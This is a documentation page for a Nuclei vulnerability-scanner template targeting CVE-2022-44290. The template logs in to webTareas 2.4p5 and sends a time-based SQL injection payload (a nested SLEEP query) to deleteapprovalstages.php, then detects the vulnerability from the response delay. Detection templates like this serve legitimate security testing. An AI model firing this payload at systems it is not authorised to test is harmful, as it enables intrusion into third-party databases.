Skip to content
Nuclei Templates

WebTareas 2.4p5 - SQL Injection

ID: CVE-2022-44290

Severity: critical

Author: theamanrawat

Tags: time-based-sqli,cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project

Description

Section titled “Description”

webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in deleteapprovalstages.php.

YAML Source

Section titled “YAML Source”
id: CVE-2022-44290


info:
  name: WebTareas 2.4p5 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in deleteapprovalstages.php.
  reference:
    - http://webtareas.com/
    - https://github.com/anhdq201/webtareas/issues/2
    - https://nvd.nist.gov/vuln/detail/CVE-2022-44290
    - http://webtareas.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-44290
    cwe-id: CWE-89
    epss-score: 0.0091
    epss-percentile: 0.82781
    cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: webtareas_project
    product: webtareas
  tags: time-based-sqli,cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project


http:
  - raw:
      - |
        POST /general/login.php?session=false HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525


        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="action"


        login
        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="loginForm"


        {{username}}
        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="passwordForm"


        {{password}}
        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="loginSubmit"


        Log In
        -----------------------------3023071625140724693672385525--
      - |
        @timeout: 20s
        GET /approvals/deleteapprovalstages.php?id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - status_code == 200
          - contains(header, "text/html")
          - contains(body, 'Delete the following?')
        condition: and
# digest: 4a0a0047304502210086a81bce06977943c1aa4063e89f1ae5e920fb719740c9db9704e085b88df290022031ad2b523d58e0c08b749c6bb1f2c6991e6df48fde99ba8021b6b91013d10dea:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-44290.yaml"

View on Github